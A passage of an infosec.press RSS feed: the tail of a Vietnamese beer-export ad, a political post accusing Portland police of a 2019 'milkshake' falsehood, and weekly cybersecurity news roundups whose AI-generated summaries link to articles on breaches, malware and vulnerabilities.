<p style="text-align:justify">Với sự kết hợp giữa bề dày kinh nghiệm, công nghệ hiện đại và đảm bảo đẳng cấp, A&amp;B Vietnam không chỉ cung cấp những hàng sản xuất bia đạt chuẩn mà còn đồng hành cùng người đồng hành chinh phục kênh phân phối toàn cầu. Hãy gọi ngay với A&amp;B Vietnam để cùng nhau đưa vị đặc trưng bia Việt Nam vươn xa.</p>

<p style="text-align:right">A&amp;B Vietnam</p>
]]></content:encoded>
      <author>A&amp;B Vietnam</author>
      <guid>https://infosec.press/read/a/61lf74pvhn</guid>
      <pubDate>Fri, 03 Oct 2025 04:56:24 +0000</pubDate>
    </item>
    <item>
      <title>PPB&#39;s Milky Predicate</title>
      <link>https://infosec.press/b_/ppbs-milky-predicate</link>
      <description>&lt;![CDATA[  “In June 2019, Portland Antifa terrorists were arrested after assaulting rightwing demonstrators and police with quick drying cement and bear spray.”&#xA;  The White House&#xA;&#xA;PPB’s baseless lie from 6 years ago is being used as pretext for an authoritarian crackdown against Portlanders, as well as decent, working class volunteers who oppose fascists and neo-Nazis all over the USA. &#xA;&#xA;At any point, PPB could have displayed a minimal commitment to truth and civic responsibility by retracting this bullshit; but, even as their own Police Commissioner &amp; Mayor Ted Wheeler’s City Hall was evacuated due to bomb threats, they never did. &#xA;&#xA;PPB consistently displays far-right malice toward the people of PDX, and are too rarely held to account for it. Nobody should be under the illusion that they’re going to be helpful against Trump’s current fascist military deployment. &#xA;&#xA;🔗]]&gt;</description>
      <content:encoded><![CDATA[<blockquote><p>“In June 2019, Portland Antifa terrorists were arrested after assaulting rightwing demonstrators and police with quick drying cement and bear spray.”
  – <a href="https://web.archive.org/web/20250930140752/https://www.whitehouse.gov/articles/2025/09/president-trump-deploys-federal-resources-to-crush-violent-radical-left-terrorism-in-portland/" rel="nofollow">The White House</a></p></blockquote>

<p><a href="https://www.portlandmercury.com/news/2019/07/15/26808599/activists-calls-on-city-to-retract-inflammatory-milkshake-tweet" rel="nofollow">PPB’s baseless lie</a> from <a href="https://www.wweek.com/news/courts/2019/07/10/is-it-possible-to-mix-cement-into-a-vegan-milkshake-we-did-it/" rel="nofollow">6 years ago</a> is being used as pretext for an authoritarian crackdown against Portlanders, as well as decent, working class volunteers who oppose fascists and neo-Nazis all over the USA.</p>

<p>At any point, PPB could have displayed a minimal commitment to truth and civic responsibility by retracting this bullshit; but, even as their own Police Commissioner &amp; Mayor Ted Wheeler’s <a href="https://www.oregonlive.com/portland/2019/07/portland-city-hall-evacuated-due-to-report-of-bomb-threat.html" rel="nofollow">City Hall was evacuated due to bomb threats</a>, they never did.</p>

<p>PPB consistently <a href="https://www.oregonlive.com/crime/2022/01/portland-police-training-on-protests-ends-with-slide-showing-mock-prayer-for-dirty-hippie-prompts-investigation.html" rel="nofollow">displays</a> <a href="https://www.theguardian.com/us-news/2024/feb/19/blm-march-portland-shooting" rel="nofollow">far-right malice toward the people of PDX</a>, and are too rarely held to account for it. Nobody should be under the illusion that they’re going to be helpful against <a href="https://www.opb.org/article/2025/09/28/oregon-portland-sue-trump-deployment/" rel="nofollow">Trump’s current fascist military deployment</a>.</p>

<p><a href="https://convo.casa/@b/115293954387148434" rel="nofollow">🔗</a></p>
]]></content:encoded>
      <author>b</author>
      <guid>https://infosec.press/read/a/mp4sj7towz</guid>
      <pubDate>Tue, 30 Sep 2025 17:20:08 +0000</pubDate>
    </item>
    <item>
      <title>cyberlights - week 39/2025</title>
      <link>https://infosec.press/wrzlbrmpfts-cyberlights/cyberlights-week-39-2025</link>
      <description>&lt;![CDATA[A weekly shortlist of cyber security highlights.&#xA;The short summaries are AI generated! If something is wrong, please let me know!&#xA;&#xA;---&#xA;News For All&#xA;🚗 Stellantis says a third-party vendor spilled customer data&#xA;data breach - Stellantis confirms a data leak due to a third-party vendor breach, exposing customer names and emails. They have initiated an investigation and warned customers about potential phishing risks.&#xA;https://www.theregister.com/2025/09/22/stellantisbreach/&#xA;&#xA;⚠️ FBI alerts public to spoofed IC3 site used in fraud schemes&#xA;cybercrime - The FBI warns of spoofed IC3 websites designed to steal personal information from users reporting cybercrimes. Users should verify URLs carefully to avoid falling victim to fraud.&#xA;https://securityaffairs.com/182449/cyber-crime/fbi-alerts-public-to-spoofed-ic3-site-used-in-fraud-schemes.html&#xA;&#xA;🦠 Here’s how potent Atomic credential stealer is finding its way onto Macs&#xA;malware - Malicious ads impersonate services like LastPass to spread Atomic Stealer on Macs. Users are warned to avoid clicking ads and to download software only from official websites.&#xA;https://arstechnica.com/security/2025/09/potent-atomic-credential-stealer-can-bypass-gatekeeper/&#xA;&#xA;🎮 Steam game removed after cryptostealer takes over $150K&#xA;malware - A Steam game was pulled after a cryptostealer exploited it, stealing over $150,000 from users. The incident highlights the ongoing risks of malware in gaming platforms.&#xA;https://www.theverge.com/news/782993/steam-blockblasters-crypto-scam-malware&#xA;&#xA;😩 AI ‘Workslop’ Is Killing Productivity and Making Workers Miserable&#xA;privacy - A study reveals that AI-generated content, termed &#39;workslop&#39;, burdens workers with fixing low-quality outputs, undermining productivity rather than enhancing it. Companies struggle to define AI&#39;s benefits amid rising risks.&#xA;https://www.404media.co/ai-workslop-is-killing-productivity-and-making-workers-miserable/&#xA;&#xA;🚧 Jaguar Land Rover extends shutdown again following cyberattack&#xA;data breach - Jaguar Land Rover&#39;s operations remain halted due to a cyberattack, with losses estimated at £50-70 million daily. The shutdown affects thousands of workers and disrupts the broader supply chain.&#xA;https://therecord.media/jaguar-land-rover-extends-shutdown-again-cyberattack&#xA;&#xA;🧳 Worried About Phone Searches? 1Password’s Travel Mode Can Clean Up Your Data&#xA;privacy - 1Password’s Travel Mode helps protect your data during phone searches by removing sensitive information temporarily. This feature is ideal for travelers concerned about privacy.&#xA;https://www.wired.com/story/1password-travel-mode/&#xA;&#xA;⚖️ What to do if your company discovers a North Korean worker in its ranks&#xA;cyber defense - Companies discovering North Korean IT workers face complex legal and cybersecurity challenges. Experts advise cooperation with the workers, careful monitoring, and engaging law enforcement to mitigate risks.&#xA;https://cyberscoop.com/north-korean-it-workers-enterprise-risks-sanctions-response/&#xA;&#xA;📰 Researchers say media outlet targeting Moldova is a Russian cutout&#xA;security research - Researchers link the online news outlet REST Media to the Russian disinformation group Rybar, revealing its role in influencing Moldova&#39;s elections through deceptive tactics and social media.&#xA;https://cyberscoop.com/researchers-say-media-outlet-targeting-moldova-is-russian-cutout/&#xA;&#xA;💰 Feds Tie ‘Scattered Spider’ Duo to $115M in Ransoms – Krebs on Security&#xA;cybercrime - U.S. prosecutors charged Thalha Jubair and Owen Flowers, members of the Scattered Spider group, with hacking and extorting over $115 million. Their operations involved significant cyberattacks against major retailers and transport systems.&#xA;https://krebsonsecurity.com/2025/09/feds-tie-scattered-spider-duo-to-115m-in-ransoms/&#xA;&#xA;🚓 ‘Find My Parking Cops’ Tracks Officers Handing Out Tickets All Around San Francisco&#xA;privacy - Riley Walz created &#39;Find My Parking Cops,&#39; a site that maps San Francisco parking officers issuing tickets, helping users avoid fines. The city responded by altering access to public data.&#xA;https://www.404media.co/find-my-parking-cops-tracks-officers-handing-out-tickets-all-around-san-francisco/&#xA;&#xA;✈️ UK arrests man in airport ransomware attack that caused delays across Europe&#xA;security news - A man was arrested in connection with a ransomware attack affecting multiple European airports, causing significant flight delays. The attack targeted the MUSE software, with reports suggesting simple ransomware tools were used.&#xA;https://www.theverge.com/news/784786/uk-nca-europe-airport-cyberattack-ransomware-arrest&#xA;&#xA;🔒 Volvo North America disclosed a data breach following a ransomware attack on IT provider Miljödata&#xA;data breach - A ransomware attack on supplier Miljödata exposed personal data of Volvo North America employees, including names and Social Security numbers. Volvo is offering affected individuals 18 months of identity protection services.&#xA;https://securityaffairs.com/182577/data-breach/volvo-north-america-disclosed-a-data-breach-following-a-ransomware-attack-on-it-provider-miljodata.html&#xA;&#xA;🚨 Cybercrooks publish toddlers&#39; data in &#39;reprehensible&#39; attack&#xA;data breach - The Radiant Group targeted Kido International, leaking sensitive data of toddlers and their parents, including names and addresses. Experts condemned the attack as a severe moral low for cybercriminals.&#xA;https://www.theregister.com/2025/09/25/ransomwaregangpublishestoddlers_images/&#xA;&#xA;☁️ DOGE might be storing every American’s SSN on an insecure cloud server&#xA;privacy - Senate Democrats report that DOGE has transferred sensitive information, potentially including Social Security numbers, to a cloud server, raising concerns about catastrophic security risks.&#xA;https://www.theverge.com/news/785706/doge-insecure-cloud-server-social-security-numbers&#xA;&#xA;🔒 Viral call-recording app Neon goes dark after exposing users&#39; phone numbers, call recordings, and transcripts&#xA;data breach - The call-recording app Neon has been taken offline after a security flaw exposed users&#39; phone numbers, call recordings, and transcripts. The founder announced the shutdown while failing to address the security lapse.&#xA;https://techcrunch.com/2025/09/25/viral-call-recording-app-neon-goes-dark-after-exposing-users-phone-numbers-call-recordings-and-transcripts/&#xA;&#xA;---&#xA;Some More, For the Curious&#xA;🤖 Researchers expose MalTerminal, an LLM&#xA;malware - MalTerminal is the first known malware using LLM technology to create malicious code dynamically, complicating detection for defenders. Researchers highlight the evolving threat landscape with LLM-integrated attacks.&#xA;https://securityaffairs.com/182433/malware/researchers-expose-malterminal-an-llm-enabled-malware-pioneer.html&#xA;&#xA;⚖️ Modern Solution: Bundesverfassungsgerich bestätigt – Wegsehen ist sicherer als Aufdecken&#xA;security news - Germany&#39;s courts penalize a security expert for exposing a major vulnerability in e-commerce software instead of holding the developer accountable, undermining responsible disclosure and IT security.&#xA;https://www.kuketz-blog.de/modern-solution-bundesverfassungsgerich-bestaetigt-wegsehen-ist-sicherer-als-aufdecken/&#xA;&#xA;💰 $150K awarded for L1TF Reloaded exploit that bypasses cloud mitigations&#xA;vulnerability - Researchers earned $150K for exploiting L1TF Reloaded, leaking VM memory from public clouds despite mitigations. The attack demonstrates ongoing risks from transient CPU vulnerabilities.&#xA;https://securityaffairs.com/182476/security/150k-awarded-for-l1tf-reloaded-exploit-that-bypasses-cloud-mitigations.html&#xA;&#xA;📞 Secret Service says it dismantled extensive telecom threat in NYC area&#xA;cybercrime - The Secret Service disrupted a telecom network in NYC, uncovering 300 servers and 100,000 SIM cards used for encrypted communications by threat actors. Concerns about potential disruptions during the U.N. General Assembly were raised.&#xA;https://cyberscoop.com/secret-service-dismantles-nyc-telecom-threat-un-general-assembly/&#xA;&#xA;🔓 Bypassing Mark of the Web (MoTW) via Windows Shortcuts (LNK): LNK Stomping Technique&#xA;hacking write-up - The LNK Stomping technique exploits Windows shortcuts to bypass security checks by manipulating file metadata, allowing attackers to execute malicious payloads undetected. This method highlights the evolving nature of cyber threats.&#xA;https://asec.ahnlab.com/en/90299/&#xA;&#xA;⚠️ Critical Vulnerability in SolarWinds Web Help Desk&#xA;vulnerability - SolarWinds disclosed a critical vulnerability (CVE-2025-26399) in its Web Help Desk, allowing unauthenticated remote code execution. Users are urged to update to the latest version immediately.&#xA;https://cert.europa.eu/publications/security-advisories/2025-034/&#xA;&#xA;🛡️ EDR Bypass Technique Uses Windows Functions to Put Antivirus Tools to Sleep&#xA;security research - The EDR-Freeze technique allows attackers to bypass endpoint detection and response (EDR) tools by using Windows functions to suspend antivirus processes without installing vulnerable drivers. This new method enhances evasion tactics for threat actors.&#xA;https://thecyberexpress.com/edr-bypass-technique-disables-antivirus/&#xA;&#xA;⚠️ High Vulnerability in Cisco IOS and IOS XE Software&#xA;warning - Cisco reported a high-severity vulnerability (CVE-2025-20352) in its IOS and IOS XE software SNMP subsystem, allowing remote code execution or denial of service. Immediate updates and security assessments are recommended.&#xA;https://cert.europa.eu/publications/security-advisories/2025-035/&#xA;&#xA;⚠️ Worries mount over max-severity GoAnywhere defect&#xA;vulnerability - Concerns grow over a high-severity vulnerability (CVE-2025-10035) in GoAnywhere MFT, with evidence of active exploitation. Researchers criticize Forta for lack of transparency regarding the vulnerability&#39;s status.&#xA;https://cyberscoop.com/goanywhere-vulnerability-active-exploitation-september-2025/&#xA;&#xA;🔐 Critical Vulnerabilities in Cisco ASA and FTD&#xA;warning - Cisco disclosed critical vulnerabilities (CVE-2025-20333, CVE-2025-20363, CVE-2025-20362) in its ASA and FTD software, allowing remote code execution. Immediate updates and compromise assessments are recommended.&#xA;https://cert.europa.eu/publications/security-advisories/2025-036/&#xA;&#xA;---&#xA;CISA Corner&#xA;🔒 SonicWall Releases Advisory for Customers after Security Incident&#xA;security news - SonicWall alerts customers about a security incident where brute force attacks accessed cloud backup files. Users are urged to verify their account and follow guidance to secure their devices.&#xA;https://www.cisa.gov/news-events/alerts/2025/09/22/sonicwall-releases-advisory-customers-after-security-incident&#xA;🔍 CISA Shares Lessons Learned from an Incident Response Engagement&#xA;cyber defense - CISA&#39;s response to a cyber incident revealed critical vulnerabilities exploited via CVE 2024-36401. Key lessons include the importance of timely patching and robust incident response plans.&#xA;https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-266a&#xA;🤞 CISA Directs Federal Agencies to Identify and Mitigate Potential Compromise of Cisco Devices&#xA;security news - CISA issued Emergency Directive ED 25-03, urging federal agencies to address vulnerabilities in Cisco ASA and Firepower devices. Agencies must identify affected devices and transmit memory files for analysis by September 26.&#xA;https://www.cisa.gov/news-events/alerts/2025/09/25/cisa-directs-federal-agencies-identify-and-mitigate-potential-compromise-cisco-devices&#xA;&#xA;⚠️ CISA Adds One Known Exploited Vulnerability to Catalog&#xA;warning - CISA has included CVE-2025-10585, a Google Chromium V8 Type Confusion Vulnerability, in its KEV Catalog due to active exploitation risks. Federal agencies must remediate identified vulnerabilities promptly.&#xA;https://www.cisa.gov/news-events/alerts/2025/09/23/cisa-adds-one-known-exploited-vulnerability-catalog&#xA;&#xA;⚙️ Dingtian DT-R002&#xA;vulnerability - Dingtian DT-R002 relay boards have critical vulnerabilities (CVE-2025-10879 and CVE-2025-10880) that allow unauthorized retrieval of credentials. Users are urged to restrict access and enhance security measures.&#xA;https://www.cisa.gov/news-events/ics-advisories/icsa-25-268-01&#xA;⚙️ CISA Releases Six Industrial Control Systems Advisories&#xA;vulnerability - CISA issued six advisories detailing vulnerabilities in various Industrial Control Systems, including AutomationDirect and Mitsubishi Electric. Users are urged to review for mitigation strategies.&#xA;https://www.cisa.gov/news-events/alerts/2025/09/23/cisa-releases-six-industrial-control-systems-advisories&#xA;&#xA;---&#xA;While my intention is to pick news that everyone should know about, it still is what I think is significant, cool, fun...&#xA;Most of the articles are in English, but some current warnings might be in German.]]&gt;</description>
      <content:encoded><![CDATA[<p>A weekly shortlist of cyber security highlights.
The short summaries are AI generated! If something is wrong, please let me know!</p>

<hr>

<h3 id="news-for-all">News For All</h3>

<p>🚗 Stellantis says a third-party vendor spilled customer data
<em>data breach – Stellantis confirms a data leak due to a third-party vendor breach, exposing customer names and emails. They have initiated an investigation and warned customers about potential phishing risks.</em>
<a href="https://www.theregister.com/2025/09/22/stellantis_breach/" rel="nofollow">https://www.theregister.com/2025/09/22/stellantis_breach/</a></p>

<p>⚠️ FBI alerts public to spoofed IC3 site used in fraud schemes
<em>cybercrime – The FBI warns of spoofed IC3 websites designed to steal personal information from users reporting cybercrimes. Users should verify URLs carefully to avoid falling victim to fraud.</em>
<a href="https://securityaffairs.com/182449/cyber-crime/fbi-alerts-public-to-spoofed-ic3-site-used-in-fraud-schemes.html" rel="nofollow">https://securityaffairs.com/182449/cyber-crime/fbi-alerts-public-to-spoofed-ic3-site-used-in-fraud-schemes.html</a></p>

<p>🦠 Here’s how potent Atomic credential stealer is finding its way onto Macs
<em>malware – Malicious ads impersonate services like LastPass to spread Atomic Stealer on Macs. Users are warned to avoid clicking ads and to download software only from official websites.</em>
<a href="https://arstechnica.com/security/2025/09/potent-atomic-credential-stealer-can-bypass-gatekeeper/" rel="nofollow">https://arstechnica.com/security/2025/09/potent-atomic-credential-stealer-can-bypass-gatekeeper/</a></p>

<p>🎮 Steam game removed after cryptostealer takes over $150K
<em>malware – A Steam game was pulled after a cryptostealer exploited it, stealing over $150,000 from users. The incident highlights the ongoing risks of malware in gaming platforms.</em>
<a href="https://www.theverge.com/news/782993/steam-blockblasters-crypto-scam-malware" rel="nofollow">https://www.theverge.com/news/782993/steam-blockblasters-crypto-scam-malware</a></p>

<p>😩 AI ‘Workslop’ Is Killing Productivity and Making Workers Miserable
<em>privacy – A study reveals that AI-generated content, termed &#39;workslop&#39;, burdens workers with fixing low-quality outputs, undermining productivity rather than enhancing it. Companies struggle to define AI&#39;s benefits amid rising risks.</em>
<a href="https://www.404media.co/ai-workslop-is-killing-productivity-and-making-workers-miserable/" rel="nofollow">https://www.404media.co/ai-workslop-is-killing-productivity-and-making-workers-miserable/</a></p>

<p>🚧 Jaguar Land Rover extends shutdown again following cyberattack
<em>data breach – Jaguar Land Rover&#39;s operations remain halted due to a cyberattack, with losses estimated at £50-70 million daily. The shutdown affects thousands of workers and disrupts the broader supply chain.</em>
<a href="https://therecord.media/jaguar-land-rover-extends-shutdown-again-cyberattack" rel="nofollow">https://therecord.media/jaguar-land-rover-extends-shutdown-again-cyberattack</a></p>

<p>🧳 Worried About Phone Searches? 1Password’s Travel Mode Can Clean Up Your Data
<em>privacy – 1Password’s Travel Mode helps protect your data during phone searches by removing sensitive information temporarily. This feature is ideal for travelers concerned about privacy.</em>
<a href="https://www.wired.com/story/1password-travel-mode/" rel="nofollow">https://www.wired.com/story/1password-travel-mode/</a></p>

<p>⚖️ What to do if your company discovers a North Korean worker in its ranks
<em>cyber defense – Companies discovering North Korean IT workers face complex legal and cybersecurity challenges. Experts advise cooperation with the workers, careful monitoring, and engaging law enforcement to mitigate risks.</em>
<a href="https://cyberscoop.com/north-korean-it-workers-enterprise-risks-sanctions-response/" rel="nofollow">https://cyberscoop.com/north-korean-it-workers-enterprise-risks-sanctions-response/</a></p>

<p>📰 Researchers say media outlet targeting Moldova is a Russian cutout
<em>security research – Researchers link the online news outlet REST Media to the Russian disinformation group Rybar, revealing its role in influencing Moldova&#39;s elections through deceptive tactics and social media.</em>
<a href="https://cyberscoop.com/researchers-say-media-outlet-targeting-moldova-is-russian-cutout/" rel="nofollow">https://cyberscoop.com/researchers-say-media-outlet-targeting-moldova-is-russian-cutout/</a></p>

<p>💰 Feds Tie ‘Scattered Spider’ Duo to $115M in Ransoms – Krebs on Security
<em>cybercrime – U.S. prosecutors charged Thalha Jubair and Owen Flowers, members of the Scattered Spider group, with hacking and extorting over $115 million. Their operations involved significant cyberattacks against major retailers and transport systems.</em>
<a href="https://krebsonsecurity.com/2025/09/feds-tie-scattered-spider-duo-to-115m-in-ransoms/" rel="nofollow">https://krebsonsecurity.com/2025/09/feds-tie-scattered-spider-duo-to-115m-in-ransoms/</a></p>

<p>🚓 ‘Find My Parking Cops’ Tracks Officers Handing Out Tickets All Around San Francisco
<em>privacy – Riley Walz created &#39;Find My Parking Cops,&#39; a site that maps San Francisco parking officers issuing tickets, helping users avoid fines. The city responded by altering access to public data.</em>
<a href="https://www.404media.co/find-my-parking-cops-tracks-officers-handing-out-tickets-all-around-san-francisco/" rel="nofollow">https://www.404media.co/find-my-parking-cops-tracks-officers-handing-out-tickets-all-around-san-francisco/</a></p>

<p>✈️ UK arrests man in airport ransomware attack that caused delays across Europe
<em>security news – A man was arrested in connection with a ransomware attack affecting multiple European airports, causing significant flight delays. The attack targeted the MUSE software, with reports suggesting simple ransomware tools were used.</em>
<a href="https://www.theverge.com/news/784786/uk-nca-europe-airport-cyberattack-ransomware-arrest" rel="nofollow">https://www.theverge.com/news/784786/uk-nca-europe-airport-cyberattack-ransomware-arrest</a></p>

<p>🔒 Volvo North America disclosed a data breach following a ransomware attack on IT provider Miljödata
<em>data breach – A ransomware attack on supplier Miljödata exposed personal data of Volvo North America employees, including names and Social Security numbers. Volvo is offering affected individuals 18 months of identity protection services.</em>
<a href="https://securityaffairs.com/182577/data-breach/volvo-north-america-disclosed-a-data-breach-following-a-ransomware-attack-on-it-provider-miljodata.html" rel="nofollow">https://securityaffairs.com/182577/data-breach/volvo-north-america-disclosed-a-data-breach-following-a-ransomware-attack-on-it-provider-miljodata.html</a></p>

<p>🚨 Cybercrooks publish toddlers&#39; data in &#39;reprehensible&#39; attack
<em>data breach – The Radiant Group targeted Kido International, leaking sensitive data of toddlers and their parents, including names and addresses. Experts condemned the attack as a severe moral low for cybercriminals.</em>
<a href="https://www.theregister.com/2025/09/25/ransomware_gang_publishes_toddlers_images/" rel="nofollow">https://www.theregister.com/2025/09/25/ransomware_gang_publishes_toddlers_images/</a></p>

<p>☁️ DOGE might be storing every American’s SSN on an insecure cloud server
<em>privacy – Senate Democrats report that DOGE has transferred sensitive information, potentially including Social Security numbers, to a cloud server, raising concerns about catastrophic security risks.</em>
<a href="https://www.theverge.com/news/785706/doge-insecure-cloud-server-social-security-numbers" rel="nofollow">https://www.theverge.com/news/785706/doge-insecure-cloud-server-social-security-numbers</a></p>

<p>🔒 Viral call-recording app Neon goes dark after exposing users&#39; phone numbers, call recordings, and transcripts
<em>data breach – The call-recording app Neon has been taken offline after a security flaw exposed users&#39; phone numbers, call recordings, and transcripts. The founder announced the shutdown while failing to address the security lapse.</em>
<a href="https://techcrunch.com/2025/09/25/viral-call-recording-app-neon-goes-dark-after-exposing-users-phone-numbers-call-recordings-and-transcripts/" rel="nofollow">https://techcrunch.com/2025/09/25/viral-call-recording-app-neon-goes-dark-after-exposing-users-phone-numbers-call-recordings-and-transcripts/</a></p>

<hr>

<h3 id="some-more-for-the-curious">Some More, For the Curious</h3>

<p>🤖 Researchers expose MalTerminal, an LLM
<em>malware – MalTerminal is the first known malware using LLM technology to create malicious code dynamically, complicating detection for defenders. Researchers highlight the evolving threat landscape with LLM-integrated attacks.</em>
<a href="https://securityaffairs.com/182433/malware/researchers-expose-malterminal-an-llm-enabled-malware-pioneer.html" rel="nofollow">https://securityaffairs.com/182433/malware/researchers-expose-malterminal-an-llm-enabled-malware-pioneer.html</a></p>

<p>⚖️ Modern Solution: Bundesverfassungsgerich bestätigt – Wegsehen ist sicherer als Aufdecken
<em>security news – Germany&#39;s courts penalize a security expert for exposing a major vulnerability in e-commerce software instead of holding the developer accountable, undermining responsible disclosure and IT security.</em>
<a href="https://www.kuketz-blog.de/modern-solution-bundesverfassungsgerich-bestaetigt-wegsehen-ist-sicherer-als-aufdecken/" rel="nofollow">https://www.kuketz-blog.de/modern-solution-bundesverfassungsgerich-bestaetigt-wegsehen-ist-sicherer-als-aufdecken/</a></p>

<p>💰 $150K awarded for L1TF Reloaded exploit that bypasses cloud mitigations
<em>vulnerability – Researchers earned $150K for exploiting L1TF Reloaded, leaking VM memory from public clouds despite mitigations. The attack demonstrates ongoing risks from transient CPU vulnerabilities.</em>
<a href="https://securityaffairs.com/182476/security/150k-awarded-for-l1tf-reloaded-exploit-that-bypasses-cloud-mitigations.html" rel="nofollow">https://securityaffairs.com/182476/security/150k-awarded-for-l1tf-reloaded-exploit-that-bypasses-cloud-mitigations.html</a></p>

<p>📞 Secret Service says it dismantled extensive telecom threat in NYC area
<em>cybercrime – The Secret Service disrupted a telecom network in NYC, uncovering 300 servers and 100,000 SIM cards used for encrypted communications by threat actors. Concerns about potential disruptions during the U.N. General Assembly were raised.</em>
<a href="https://cyberscoop.com/secret-service-dismantles-nyc-telecom-threat-un-general-assembly/" rel="nofollow">https://cyberscoop.com/secret-service-dismantles-nyc-telecom-threat-un-general-assembly/</a></p>

<p>🔓 Bypassing Mark of the Web (MoTW) via Windows Shortcuts (LNK): LNK Stomping Technique
<em>hacking write-up – The LNK Stomping technique exploits Windows shortcuts to bypass security checks by manipulating file metadata, allowing attackers to execute malicious payloads undetected. This method highlights the evolving nature of cyber threats.</em>
<a href="https://asec.ahnlab.com/en/90299/" rel="nofollow">https://asec.ahnlab.com/en/90299/</a></p>

<p>⚠️ Critical Vulnerability in SolarWinds Web Help Desk
<em>vulnerability – SolarWinds disclosed a critical vulnerability (CVE-2025-26399) in its Web Help Desk, allowing unauthenticated remote code execution. Users are urged to update to the latest version immediately.</em>
<a href="https://cert.europa.eu/publications/security-advisories/2025-034/" rel="nofollow">https://cert.europa.eu/publications/security-advisories/2025-034/</a></p>

<p>🛡️ EDR Bypass Technique Uses Windows Functions to Put Antivirus Tools to Sleep
<em>security research – The EDR-Freeze technique allows attackers to bypass endpoint detection and response (EDR) tools by using Windows functions to suspend antivirus processes without installing vulnerable drivers. This new method enhances evasion tactics for threat actors.</em>
<a href="https://thecyberexpress.com/edr-bypass-technique-disables-antivirus/" rel="nofollow">https://thecyberexpress.com/edr-bypass-technique-disables-antivirus/</a></p>

<p>⚠️ High Vulnerability in Cisco IOS and IOS XE Software
<em>warning – Cisco reported a high-severity vulnerability (CVE-2025-20352) in its IOS and IOS XE software SNMP subsystem, allowing remote code execution or denial of service. Immediate updates and security assessments are recommended.</em>
<a href="https://cert.europa.eu/publications/security-advisories/2025-035/" rel="nofollow">https://cert.europa.eu/publications/security-advisories/2025-035/</a></p>

<p>⚠️ Worries mount over max-severity GoAnywhere defect
<em>vulnerability – Concerns grow over a high-severity vulnerability (CVE-2025-10035) in GoAnywhere MFT, with evidence of active exploitation. Researchers criticize Forta for lack of transparency regarding the vulnerability&#39;s status.</em>
<a href="https://cyberscoop.com/goanywhere-vulnerability-active-exploitation-september-2025/" rel="nofollow">https://cyberscoop.com/goanywhere-vulnerability-active-exploitation-september-2025/</a></p>

<p>🔐 Critical Vulnerabilities in Cisco ASA and FTD
<em>warning – Cisco disclosed critical vulnerabilities (CVE-2025-20333, CVE-2025-20363, CVE-2025-20362) in its ASA and FTD software, allowing remote code execution. Immediate updates and compromise assessments are recommended.</em>
<a href="https://cert.europa.eu/publications/security-advisories/2025-036/" rel="nofollow">https://cert.europa.eu/publications/security-advisories/2025-036/</a></p>

<hr>

<h3 id="cisa-corner">CISA Corner</h3>

<p>🔒 SonicWall Releases Advisory for Customers after Security Incident
<em>security news – SonicWall alerts customers about a security incident where brute force attacks accessed cloud backup files. Users are urged to verify their account and follow guidance to secure their devices.</em>
<a href="https://www.cisa.gov/news-events/alerts/2025/09/22/sonicwall-releases-advisory-customers-after-security-incident" rel="nofollow">https://www.cisa.gov/news-events/alerts/2025/09/22/sonicwall-releases-advisory-customers-after-security-incident</a>
🔍 CISA Shares Lessons Learned from an Incident Response Engagement
<em>cyber defense – CISA&#39;s response to a cyber incident revealed critical vulnerabilities exploited via CVE 2024-36401. Key lessons include the importance of timely patching and robust incident response plans.</em>
<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-266a" rel="nofollow">https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-266a</a>
🤞 CISA Directs Federal Agencies to Identify and Mitigate Potential Compromise of Cisco Devices
<em>security news – CISA issued Emergency Directive ED 25-03, urging federal agencies to address vulnerabilities in Cisco ASA and Firepower devices. Agencies must identify affected devices and transmit memory files for analysis by September 26.</em>
<a href="https://www.cisa.gov/news-events/alerts/2025/09/25/cisa-directs-federal-agencies-identify-and-mitigate-potential-compromise-cisco-devices" rel="nofollow">https://www.cisa.gov/news-events/alerts/2025/09/25/cisa-directs-federal-agencies-identify-and-mitigate-potential-compromise-cisco-devices</a></p>

<p>⚠️ CISA Adds One Known Exploited Vulnerability to Catalog
<em>warning – CISA has included CVE-2025-10585, a Google Chromium V8 Type Confusion Vulnerability, in its KEV Catalog due to active exploitation risks. Federal agencies must remediate identified vulnerabilities promptly.</em>
<a href="https://www.cisa.gov/news-events/alerts/2025/09/23/cisa-adds-one-known-exploited-vulnerability-catalog" rel="nofollow">https://www.cisa.gov/news-events/alerts/2025/09/23/cisa-adds-one-known-exploited-vulnerability-catalog</a></p>

<p>⚙️ Dingtian DT-R002
<em>vulnerability – Dingtian DT-R002 relay boards have critical vulnerabilities (CVE-2025-10879 and CVE-2025-10880) that allow unauthorized retrieval of credentials. Users are urged to restrict access and enhance security measures.</em>
<a href="https://www.cisa.gov/news-events/ics-advisories/icsa-25-268-01" rel="nofollow">https://www.cisa.gov/news-events/ics-advisories/icsa-25-268-01</a>
⚙️ CISA Releases Six Industrial Control Systems Advisories
<em>vulnerability – CISA issued six advisories detailing vulnerabilities in various Industrial Control Systems, including AutomationDirect and Mitsubishi Electric. Users are urged to review for mitigation strategies.</em>
<a href="https://www.cisa.gov/news-events/alerts/2025/09/23/cisa-releases-six-industrial-control-systems-advisories" rel="nofollow">https://www.cisa.gov/news-events/alerts/2025/09/23/cisa-releases-six-industrial-control-systems-advisories</a></p>

<hr>

<p>While my intention is to pick news that everyone should know about, it still is what I think is significant, cool, fun...
Most of the articles are in English, but some current warnings might be in German.</p>
]]></content:encoded>
      <author>📰wrzlbrmpft&#39;s cyberlights💥</author>
      <guid>https://infosec.press/read/a/qipyxi7ljg</guid>
      <pubDate>Sun, 28 Sep 2025 19:37:37 +0000</pubDate>
    </item>
    <item>
      <title>cyberlights - week 38/2025</title>
      <link>https://infosec.press/wrzlbrmpfts-cyberlights/cyberlights-week-38-2025</link>
      <description>&lt;![CDATA[A weekly shortlist of cyber security highlights.&#xA;The short summaries are AI generated! If something is wrong, please let me know!&#xA;&#xA;---&#xA;News For All&#xA;✈️ Airlines Sell 5 Billion Plane Ticket Records to the Government For Warrantless Searching&#xA;privacy - Major airlines are selling billions of ticket records to the government for warrantless monitoring, raising significant privacy concerns about surveillance of individuals&#39; movements.&#xA;https://www.404media.co/airlines-sell-5-billion-plane-ticket-records-to-the-government-for-warrantless-searching/&#xA;&#xA;🔑 Password Security Part 2: The Human Factor – Password Patterns and Weaknesses&#xA;cyber defense - Human behavior leads to predictable password patterns that compromise security. Organizations can mitigate risks through password policies, filtering, and multi-factor authentication, while credential audits reveal weaknesses.&#xA;https://www.guidepointsecurity.com/blog/password-security-part-2-human-factor-patterns-weaknesses/&#xA;&#xA;💼 Hackers steal millions of Gucci, Balenciaga, and Alexander McQueen customer records&#xA;data breach - 